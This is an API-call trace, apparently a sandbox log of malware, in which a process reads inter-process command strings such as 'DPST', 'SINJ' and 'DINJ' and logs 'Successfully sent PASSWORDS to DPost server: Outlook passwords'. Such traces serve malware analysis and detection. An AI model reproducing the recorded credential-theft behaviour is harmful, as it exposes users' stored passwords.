	[0223.691] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225b88, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225b88*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0223.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0223.691] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff30
	[0223.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x22fff30, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0223.691] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x24d5b0, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x24d5b0, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0223.691] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225968, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225968*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0223.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0223.691] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783e8
	[0223.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x27783e8, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0223.691] SetEvent (hEvent=0x474) returned 1
	[0223.692] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b88) returned 1
	[0223.692] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d5b0) returned 1
	[0223.692] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225968) returned 1
	[0223.692] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778410
	[0223.692] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0223.692] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0223.692] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0223.692] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0223.692] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0223.692] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff78
	[0223.692] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27783c0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xb84) returned 0x5dc
	[0223.693] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778438
	[0223.693] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.693] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.693] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778438) returned 1
	[0223.693] Sleep (dwMilliseconds=0xbb8) 
	[0223.705] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.705] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.705] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.705] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.705] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.706] Sleep (dwMilliseconds=0xbb8) 
	[0223.721] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.721] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.721] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.721] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.721] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.721] Sleep (dwMilliseconds=0xbb8) 
	[0223.736] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.736] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.736] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.737] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.737] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.737] Sleep (dwMilliseconds=0xbb8) 
	[0223.752] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.753] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.753] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.753] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.753] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.753] Sleep (dwMilliseconds=0xbb8) 
	[0223.767] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.767] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.768] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.768] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.768] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.768] Sleep (dwMilliseconds=0xbb8) 
	[0223.783] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.783] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.783] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.783] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.783] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.783] Sleep (dwMilliseconds=0xbb8) 
	[0223.798] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.798] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.798] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.798] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.798] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.798] Sleep (dwMilliseconds=0xbb8) 
	[0223.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.814] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.814] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.814] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.814] Sleep (dwMilliseconds=0xbb8) 
	[0223.830] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.830] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.830] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.830] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.830] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.830] Sleep (dwMilliseconds=0xbb8) 
	[0223.845] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.845] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.845] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.845] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.845] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.845] Sleep (dwMilliseconds=0xbb8) 
	[0223.868] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.868] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.868] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.868] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.869] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.869] Sleep (dwMilliseconds=0xbb8) 
	[0223.876] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.876] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.876] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.876] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.876] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.876] Sleep (dwMilliseconds=0xbb8) 
	[0223.892] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.892] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.892] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.892] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.892] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.892] Sleep (dwMilliseconds=0xbb8) 
	[0223.908] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.908] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.908] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.908] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.908] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.908] Sleep (dwMilliseconds=0xbb8) 
	[0223.924] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.924] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.924] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.924] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.924] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0223.924] Sleep (dwMilliseconds=0xbb8) 
	[0223.947] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778640
	[0223.947] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.947] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0223.947] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b88
	[0223.947] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x24d5b0
	[0223.947] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0223.947] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0223.947] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef650, lpBuffer=0x225b88, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225b88*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0223.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0223.947] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22acf58
	[0223.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x22acf58, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5
	[0223.948] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x39b650, lpBuffer=0x24d5b0, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x24d5b0*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0223.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x24d5b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63
	[0223.948] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225da8
	[0223.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x24d5b0, cbMultiByte=-1, lpWideCharStr=0x225da8, cchWideChar=63 | out: lpWideCharStr="Successfully sent PASSWORDS to DPost server: Outlook passwords") returned 63
	[0223.948] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef534, lpBuffer=0x225d20, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225d20*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0223.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0223.948] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778668
	[0223.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x2778668, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0223.948] SetEvent (hEvent=0x49c) returned 1
	[0223.949] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b88) returned 1
	[0223.949] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d5b0) returned 1
	[0223.949] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0223.949] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778690
	[0223.949] lstrcmpiW (lpString1="DPST", lpString2="ModuleQuery") returned -1
	[0223.949] lstrcmpiW (lpString1="DPST", lpString2="WantRelease") returned -1
	[0223.949] lstrcmpiW (lpString1="DPST", lpString2="VERS") returned -1
	[0223.949] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0223.949] lstrcmpiW (lpString1="DPST", lpString2="DINJ") returned 1
	[0223.949] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22acdc0
	[0223.949] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2778640, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xb88) returned 0x568
	[0223.950] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27786b8
	[0223.950] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.950] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27786b8) returned 1
	[0223.950] Sleep (dwMilliseconds=0xbb8) 
	[0223.954] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0223.954] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.954] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.954] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.954] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0223.954] Sleep (dwMilliseconds=0xbb8) 
	[0223.970] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0223.970] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.970] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.970] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.970] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0223.971] Sleep (dwMilliseconds=0xbb8) 
	[0223.986] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0223.986] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.986] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.986] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.986] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0223.986] Sleep (dwMilliseconds=0xbb8) 
	[0224.001] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0224.001] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.002] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.002] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.002] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0224.002] Sleep (dwMilliseconds=0xbb8) 
	[0224.017] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0224.017] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.017] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.017] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.017] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0224.017] Sleep (dwMilliseconds=0xbb8) 
	[0224.032] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0224.032] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.032] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.032] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.032] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0224.032] Sleep (dwMilliseconds=0xbb8) 
	[0224.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0224.048] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.048] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.048] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.048] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0224.048] Sleep (dwMilliseconds=0xbb8) 
	[0224.063] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0224.063] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.064] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.064] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.064] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0224.064] Sleep (dwMilliseconds=0xbb8) 
	[0224.080] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0224.080] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.080] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.080] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.080] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0224.080] Sleep (dwMilliseconds=0xbb8) 
	[0224.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0224.095] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.095] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.095] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.095] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0224.095] Sleep (dwMilliseconds=0xbb8) 
	[0224.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0224.110] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.110] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.110] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.110] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0224.110] Sleep (dwMilliseconds=0xbb8) 
	[0224.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0224.126] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.126] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.126] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.126] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0224.126] Sleep (dwMilliseconds=0xbb8) 
	[0224.172] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0224.172] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.172] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.172] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.172] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0224.172] Sleep (dwMilliseconds=0xbb8) 
	[0224.174] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0224.174] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0224.174] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0224.174] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x2745158
	[0224.174] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0224.174] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0224.174] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225d20, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225d20*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0224.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0224.174] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b76c8
	[0224.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x22b76c8, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0224.174] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x2745158, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2745158, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0224.174] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0224.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0224.174] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788e8
	[0224.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x27788e8, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0224.174] SetEvent (hEvent=0x474) returned 1
	[0224.174] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0224.174] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745158) returned 1
	[0224.174] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0224.174] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778910
	[0224.175] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0224.175] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0224.175] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0224.175] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0224.175] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0224.175] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b76f8
	[0224.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27788c0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xa2c) returned 0x5f4
	[0224.175] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778938
	[0224.175] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.175] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.175] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0224.175] Sleep (dwMilliseconds=0xbb8) 
	[0224.189] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.189] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.189] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.189] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.189] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.189] Sleep (dwMilliseconds=0xbb8) 
	[0224.204] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.204] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
